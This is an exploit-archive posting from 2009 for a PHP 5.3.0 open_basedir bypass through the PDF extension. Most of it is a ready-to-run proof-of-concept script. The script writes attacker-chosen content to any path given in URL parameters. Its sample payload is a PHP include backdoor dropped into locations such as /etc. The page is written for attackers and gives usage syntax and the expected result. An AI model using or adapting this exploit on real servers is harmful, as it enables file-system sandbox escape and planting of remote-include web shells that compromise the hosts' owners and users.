Home / exploitsPDF  

php530-bypass.txt

Posted on 06 November 2009

Description: ------------ Via this bug , attacker can save a file in path that not allowed in open_basedir . Reproduce code: --------------- <?php // Author : Sina Yazdanmehr (R3d.W0rm) ; Our Site : http://IrCrash.com if(!extension_loaded('pdf')){ die('pdf extension required .'); }else{ $__PATH = $_GET['p']; /*The path that u want save file in .ex: /etc/file.php*/ $__VALUE = $_GET['v']; /*The text that u want save in file .ex: <?php include $_GET[f];?>*/ if(!isset($__PATH,$__VALUE)){ die('/expl.php?p=[path_u_want_save_file]/[file_name]&v=[value_u_want_sav e_in_file]'); } $__IRCRASH = pdf_new(); pdf_open_file($__IRCRASH,$__PATH); pdf_begin_page($__IRCRASH,612,792); pdf_add_note($__IRCRASH,100,650,200,750,$__VALUE,'R3d.W0rm','note',0); pdf_end_page($__IRCRASH); pdf_close($__IRCRASH); pdf_delete($__IRCRASH); print('<p>IrCrash Security Team .</p>'); print('<p>' . $__PATH . " " . 'created .</p>');} ?> Expected result: ---------------- When attacker run this code , a file in a path that attacker input in `p` in url , whith value that attacker input in `v` in url.

 

TOP